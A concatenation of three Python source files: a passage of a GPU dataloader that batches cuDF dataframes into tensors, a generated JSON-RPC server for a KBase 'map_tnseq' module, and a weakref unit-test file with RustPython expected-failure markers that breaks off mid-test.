if len(chunks) == 4:
offsets = chunks[-1]
if use_nnz:
nnzs = offsets[1:] - offsets[:-1]
chunks = chunks[:-1]
# split them into batches and map to the framework-specific output format
batches = [[] for _ in range(len(split_idx))]
offset_idx = 0
for chunk in chunks:
lists = None
if isinstance(chunk, tuple):
chunk, lists = chunk
if len(split_idx) > 1 and chunk is not None:
chunk = self._split_fn(chunk, split_idx)
else:
chunk = [chunk for _ in split_idx]
if lists is not None:
num_list_columns = len(lists)
# grab the set of offsets and nnzs corresponding to
# the list columns from this chunk
chunk_offsets = offsets[:, offset_idx : offset_idx + num_list_columns]
if use_nnz:
chunk_nnzs = nnzs[:, offset_idx : offset_idx + num_list_columns]
offset_idx += num_list_columns
# split them into batches, including an extra 1 on the offsets
# so we know how long the very last element is
batch_offsets = self._split_fn(chunk_offsets, split_idx + [1])
if use_nnz and len(split_idx) > 1:
batch_nnzs = self._split_fn(chunk_nnzs, split_idx)
elif use_nnz:
batch_nnzs = [chunk_nnzs]
else:
batch_nnzs = [None] * (len(batch_offsets) - 1)
# group all these indices together and iterate through
# them in batches to grab the proper elements from each
# values tensor
chunk = zip(chunk, batch_offsets[:-1], batch_offsets[1:], batch_nnzs)
for n, c in enumerate(chunk):
if isinstance(c, tuple):
c, off0s, off1s, _nnzs = c
offsets_split_idx = [1 for _ in range(num_list_columns)]
off0s = self._split_fn(off0s, offsets_split_idx, axis=1)
off1s = self._split_fn(off1s, offsets_split_idx, axis=1)
if use_nnz:
_nnzs = self._split_fn(_nnzs, offsets_split_idx, axis=1)
# TODO: does this need to be ordereddict?
batch_lists = {}
for k, (column_name, values) in enumerate(lists.items()):
off0, off1 = off0s[k], off1s[k]
if use_nnz:
nnz = _nnzs[k]
# need to grab scalars for TF case
if len(off0.shape) == 1:
start, stop = off0[0], off1[0]
elif len(off0.shape) == 2:
start, stop = off0[0, 0], off1[0, 0]
else:
print(off0, off1)
raise ValueError
value = values[start:stop]
index = off0 - start if not use_nnz else nnz
batch_lists[column_name] = (value, index)
c = (c, batch_lists)
batches[n].append(c)
return [self._handle_tensors(*batch) for batch in batches]
def _get_segment_lengths(self, num_samples):
"""
Helper function to build indices to pass
to <torch|tf>.split functions for breaking
up into batches
"""
num_full_batches = _num_steps(num_samples, self.batch_size) - 1
idx = [self.batch_size for _ in range(num_full_batches)]
idx.append(num_samples - num_full_batches * self.batch_size)
return idx
def _to_sparse_tensor(self, values_offset, column_name):
"""
Create a sparse representation of the input tensor.
values_offset is either a tensor or a tuple of tensor, offset.
"""
seq_limit = self.sparse_max[column_name]
values, offsets, diff_offsets, num_rows = self._pull_values_offsets(values_offset)
max_seq_len = self._get_max_seq_len(diff_offsets)
if max_seq_len > seq_limit:
raise ValueError(
"The default sequence length has been configured "
+ f"to {seq_limit} but the "
+ f"largest sequence in this batch have {max_seq_len} length"
)
return self._build_sparse_tensor(values, offsets, diff_offsets, num_rows, seq_limit)
def _to_tensor(self, gdf, dtype=None):
"""
One of the mandatory functions a child class needs
to implement. Maps from a cudf DataFrame to a
tensor in the appropriate library, with an optional
dtype kwarg to do explicit casting if need be
"""
raise NotImplementedError
def _get_device_ctx(self, dev):
"""
One of the mandatory functions a child class needs
to implement. Maps from a GPU index to a framework
context object for placing tensors on specific GPUs
"""
raise NotImplementedError
def _split_fn(self, tensor, idx, axis=0):
raise NotImplementedError
@property
def _LONG_DTYPE(self):
raise NotImplementedError
@property
def _FLOAT32_DTYPE(self):
raise NotImplementedError
def _separate_list_columns(self, gdf):
lists, scalars = [], []
for col in gdf.columns:
if _is_list_dtype(gdf[col]):
lists.append(col)
else:
scalars.append(col)
return _get_embedding_order(scalars), _get_embedding_order(lists)
def _create_tensors(self, gdf):
"""
Breaks a dataframe down into the relevant
categorical, continuous, and label tensors.
Can be overrideen
"""
workflow_nodes = (self.cat_names, self.cont_names, self.label_names)
dtypes = (self._LONG_DTYPE, self._FLOAT32_DTYPE, self._FLOAT32_DTYPE)
tensors = []
offsets = _make_df(device=self.device)
for column_names, dtype in zip(workflow_nodes, dtypes):
if len(column_names) == 0:
tensors.append(None)
continue
gdf_i = gdf[column_names]
gdf.drop(columns=column_names, inplace=True)
scalars, lists = self._separate_list_columns(gdf_i)
x = None
if scalars:
# should always return dict column_name: values, offsets (optional)
x = self._to_tensor(gdf_i[scalars], dtype)
if lists:
list_tensors = OrderedDict()
for column_name in lists:
column = gdf_i.pop(column_name)
leaves, offsets[column_name] = _pull_apart_list(column)
list_tensors[column_name] = self._to_tensor(leaves, dtype)
x = x, list_tensors
tensors.append(x)
if not offsets.empty:
offsets_tensor = self._to_tensor(offsets, self._LONG_DTYPE)
if len(offsets_tensor.shape) == 1:
offsets_tensor = offsets_tensor[:, None]
tensors.append(offsets_tensor)
del gdf, offsets
return tensors
def _handle_tensors(self, cats, conts, labels):
X = {}
for tensor, names in zip([cats, conts], [self.cat_names, self.cont_names]):
lists = {}
if isinstance(tensor, tuple):
tensor, lists = tensor
names = [i for i in names if i not in lists]
# now add in any scalar tensors
if len(names) > 1:
tensors = self._tensor_split(tensor, len(names), axis=1)
lists.update(zip(names, tensors))
elif len(names) == 1:
lists[names[0]] = tensor
X.update(lists)
for column_name in X:
if column_name in self.sparse_names:
if column_name not in self.sparse_max:
raise ValueError(
f"Did not convert {column_name} to sparse due to missing sparse_max entry"
)
X[column_name] = self._to_sparse_tensor(X[column_name], column_name)
# TODO: use dict for labels as well?
# would require output layers to match naming
if len(self.label_names) > 1:
labels = self._tensor_split(labels, len(self.label_names), axis=1)
return X, labels
|
map_tnseqServer.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from map_tnseq.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'map_tnseq'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from map_tnseq.map_tnseqImpl import map_tnseq # noqa @IgnorePep8
impl_map_tnseq = map_tnseq(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'map_tnseq'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_map_tnseq.run_map_tnseq,
name='map_tnseq.run_map_tnseq',
types=[dict])
self.method_authentication['map_tnseq.run_map_tnseq'] = 'required' # noqa
self.rpc_service.add(impl_map_tnseq.status,
name='map_tnseq.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'map_tnseq ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
test_weakref.py | import gc
import sys
import unittest
import collections
import weakref
import operator
import contextlib
import copy
import threading
import time
import random
from test import support
from test.support import script_helper
# Used in ReferencesTestCase.test_ref_created_during_del() .
ref_from_del = None
# Used by FinalizeTestCase as a global that may be replaced by None
# when the interpreter shuts down.
_global_var = 'foobar'
class C:
def method(self):
pass
class Callable:
bar = None
def __call__(self, x):
self.bar = x
def create_function():
def f(): pass
return f
def create_bound_method():
return C().method
class Object:
def __init__(self, arg):
self.arg = arg
def __repr__(self):
return "<Object %r>" % self.arg
def __eq__(self, other):
if isinstance(other, Object):
return self.arg == other.arg
return NotImplemented
def __lt__(self, other):
if isinstance(other, Object):
return self.arg < other.arg
return NotImplemented
def __hash__(self):
return hash(self.arg)
def some_method(self):
return 4
def other_method(self):
return 5
class RefCycle:
def __init__(self):
self.cycle = self
class TestBase(unittest.TestCase):
def setUp(self):
self.cbcalled = 0
def callback(self, ref):
self.cbcalled += 1
@contextlib.contextmanager
def collect_in_thread(period=0.0001):
"""
Ensure GC collections happen in a different thread, at a high frequency.
"""
please_stop = False
def collect():
while not please_stop:
time.sleep(period)
gc.collect()
with support.disable_gc():
t = threading.Thread(target=collect)
t.start()
try:
yield
finally:
please_stop = True
t.join()
class ReferencesTestCase(TestBase):
def test_basic_ref(self):
self.check_basic_ref(C)
self.check_basic_ref(create_function)
self.check_basic_ref(create_bound_method)
# Just make sure the tp_repr handler doesn't raise an exception.
# Live reference:
o = C()
wr = weakref.ref(o)
repr(wr)
# Dead reference:
del o
repr(wr)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_basic_callback(self):
self.check_basic_callback(C)
self.check_basic_callback(create_function)
self.check_basic_callback(create_bound_method)
@support.cpython_only
def test_cfunction(self):
import _testcapi
create_cfunction = _testcapi.create_cfunction
f = create_cfunction()
wr = weakref.ref(f)
self.assertIs(wr(), f)
del f
self.assertIsNone(wr())
self.check_basic_ref(create_cfunction)
self.check_basic_callback(create_cfunction)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_multiple_callbacks(self):
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del o
self.assertIsNone(ref1(), "expected reference to be invalidated")
self.assertIsNone(ref2(), "expected reference to be invalidated")
self.assertEqual(self.cbcalled, 2,
"callback not called the right number of times")
def test_multiple_selfref_callbacks(self):
# Make sure all references are invalidated before callbacks are called
#
# What's important here is that we're using the first
# reference in the callback invoked on the second reference
# (the most recently created ref is cleaned up first). This
# tests that all references to the object are invalidated
# before any of the callbacks are invoked, so that we only
# have one invocation of _weakref.c:cleanup_helper() active
# for a particular object at a time.
#
def callback(object, self=self):
self.ref()
c = C()
self.ref = weakref.ref(c, callback)
ref1 = weakref.ref(c, callback)
del c
def test_constructor_kwargs(self):
c = C()
self.assertRaises(TypeError, weakref.ref, c, callback=None)
@unittest.skip("TODO: RUSTPYTHON, thread 'main' panicked at 'Passed a callback to weakproxy, but weakproxy does not yet support proxies.'")
def test_proxy_ref(self):
o = C()
o.bar = 1
ref1 = weakref.proxy(o, self.callback)
ref2 = weakref.proxy(o, self.callback)
del o
def check(proxy):
proxy.bar
self.assertRaises(ReferenceError, check, ref1)
self.assertRaises(ReferenceError, check, ref2)
self.assertRaises(ReferenceError, bool, weakref.proxy(C()))
self.assertEqual(self.cbcalled, 2)
def check_basic_ref(self, factory):
o = factory()
ref = weakref.ref(o)
self.assertIsNotNone(ref(),
"weak reference to live object should be live")
o2 = ref()
self.assertIs(o, o2,
"<ref>() should return original object if live")
def check_basic_callback(self, factory):
self.cbcalled = 0
o = factory()
ref = weakref.ref(o, self.callback)
del o
self.assertEqual(self.cbcalled, 1,
"callback did not properly set 'cbcalled'")
self.assertIsNone(ref(),
"ref2 should be dead after deleting object reference")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_ref_reuse(self):
o = C()
ref1 = weakref.ref(o)
# create a proxy to make sure that there's an intervening creation
# between these two; it should make no difference
proxy = weakref.proxy(o)
ref2 = weakref.ref(o)
self.assertIs(ref1, ref2,
"reference object w/out callback should be re-used")
o = C()
proxy = weakref.proxy(o)
ref1 = weakref.ref(o)
ref2 = weakref.ref(o)
self.assertIs(ref1, ref2,
"reference object w/out callback should be re-used")
self.assertEqual(weakref.getweakrefcount(o), 2,
"wrong weak ref count for object")
del proxy
self.assertEqual(weakref.getweakrefcount(o), 1,
"wrong weak ref count for object after deleting proxy")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_proxy_reuse(self):
o = C()
proxy1 = weakref.proxy(o)
ref = weakref.ref(o)
proxy2 = weakref.proxy(o)
self.assertIs(proxy1, proxy2,
"proxy object w/out callback should have been re-used")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_basic_proxy(self):
o = C()
self.check_proxy(o, weakref.proxy(o))
L = collections.UserList()
p = weakref.proxy(L)
self.assertFalse(p, "proxy for empty UserList should be false")
p.append(12)
self.assertEqual(len(L), 1)
self.assertTrue(p, "proxy for non-empty UserList should be true")
p[:] = [2, 3]
self.assertEqual(len(L), 2)
self.assertEqual(len(p), 2)
self.assertIn(3, p, "proxy didn't support __contains__() properly")
p[1] = 5
self.assertEqual(L[1], 5)
self.assertEqual(p[1], 5)
L2 = collections.UserList(L)
p2 = weakref.proxy(L2)
self.assertEqual(p, p2)
## self.assertEqual(repr(L2), repr(p2))
L3 = collections.UserList(range(10))
p3 = weakref.proxy(L3)
self.assertEqual(L3[:], p3[:])
self.assertEqual(L3[5:], p3[5:])
self.assertEqual(L3[:5], p3[:5])
self.assertEqual(L3[2:5], p3[2:5])
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_proxy_unicode(self):
# See bug 5037
class C(object):
def __str__(self):
return "string"
def __bytes__(self):
return b"bytes"
instance = C()
self.assertIn("__bytes__", dir(weakref.proxy(instance)))
self.assertEqual(bytes(weakref.proxy(instance)), b"bytes")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_proxy_index(self):
class C:
def __index__(self):
return 10
o = C()
p = weakref.proxy(o)
self.assertEqual(operator.index(p), 10)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_proxy_div(self):
class C:
def __floordiv__(self, other):
return 42
def __ifloordiv__(self, other):
return 21
o = C()
p = weakref.proxy(o)
self.assertEqual(p // 5, 42)
p //= 5
self.assertEqual(p, 21)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_proxy_matmul(self):
class C:
def __matmul__(self, other):
return 1729
def __rmatmul__(self, other):
return -163
def __imatmul__(self, other):
return 561
o = C()
p = weakref.proxy(o)
self.assertEqual(p @ 5, 1729)
self.assertEqual(5 @ p, -163)
p @= 5
self.assertEqual(p, 561)
# The PyWeakref_* C API is documented as allowing either NULL or
# None as the value for the callback, where either means "no
# callback". The "no callback" ref and proxy objects are supposed
# to be shared so long as they exist by all callers so long as
# they are active. In Python 2.3.3 and earlier, this guarantee
# was not honored, and was broken in different ways for
# PyWeakref_NewRef() and PyWeakref_NewProxy(). (Two tests.)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_shared_ref_without_callback(self):
self.check_shared_without_callback(weakref.ref)
@unittest.skip("TODO: RUSTPYTHON, thread 'main' panicked at 'Passed a callback to weakproxy, but weakproxy does not yet support proxies.'")
def test_shared_proxy_without_callback(self):
self.check_shared_without_callback(weakref.proxy)
def check_shared_without_callback(self, makeref):
o = Object(1)
p1 = makeref(o, None)
p2 = makeref(o, None)
self.assertIs(p1, p2, "both callbacks were None in the C API")
del p1, p2
p1 = makeref(o)
p2 = makeref(o, None)
self.assertIs(p1, p2, "callbacks were NULL, None in the C API")
del p1, p2
p1 = makeref(o)
p2 = makeref(o)
self.assertIs(p1, p2, "both callbacks were NULL in the C API")
del p1, p2
p1 = makeref(o, None)
p2 = makeref(o)
self.assertIs(p1, p2, "callbacks were None, NULL in the C API")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_callable_proxy(self):
o = Callable()
ref1 = weakref.proxy(o)
self.check_proxy(o, ref1)
self.assertIs(type(ref1), weakref.CallableProxyType,
"proxy is not of callable type")
ref1('twinkies!')
self.assertEqual(o.bar, 'twinkies!',
"call through proxy not passed through to original")
ref1(x='Splat.')
self.assertEqual(o.bar, 'Splat.',
"call through proxy not passed through to original")
# expect due to too few args
self.assertRaises(TypeError, ref1)
# expect due to too many args
self.assertRaises(TypeError, ref1, 1, 2, 3)
def check_proxy(self, o, proxy):
o.foo = 1
self.assertEqual(proxy.foo, 1,
"proxy does not reflect attribute addition")
o.foo = 2
self.assertEqual(proxy.foo, 2,
"proxy does not reflect attribute modification")
del o.foo
self.assertFalse(hasattr(proxy, 'foo'),
"proxy does not reflect attribute removal")
proxy.foo = 1
self.assertEqual(o.foo, 1,
"object does not reflect attribute addition via proxy")
proxy.foo = 2
self.assertEqual(o.foo, 2,
"object does not reflect attribute modification via proxy")
del proxy.foo
self.assertFalse(hasattr(o, 'foo'),
"object does not reflect attribute removal via proxy")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_proxy_deletion(self):
# Test clearing of SF bug #762891
class Foo:
result = None
def __delitem__(self, accessor):
self.result = accessor
g = Foo()
f = weakref.proxy(g)
del f[0]
self.assertEqual(f.result, 0)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_proxy_bool(self):
# Test clearing of SF bug #1170766
class List(list): pass
lyst = List()
self.assertEqual(bool(weakref.proxy(lyst)), bool(lyst))
def test_proxy_iter(self):
# Test fails with a debug build of the interpreter
# (see bpo-38395).
obj = None
class MyObj:
def __iter__(self):
nonlocal obj
del obj
return NotImplemented
obj = MyObj()
p = weakref.proxy(obj)
with self.assertRaises(TypeError):
# "blech" in p calls MyObj.__iter__ through the proxy,
# without keeping a reference to the real object, so it
# can be killed in the middle of the call
"blech" in p
@unittest.skip("TODO: RUSTPYTHON, thread 'main' panicked at 'Passed a callback to weakproxy, but weakproxy does not yet support proxies.'")
def test_getweakrefcount(self):
o = C()
ref1 = weakref.ref(o)
ref2 = weakref.ref(o, self.callback)
self.assertEqual(weakref.getweakrefcount(o), 2,
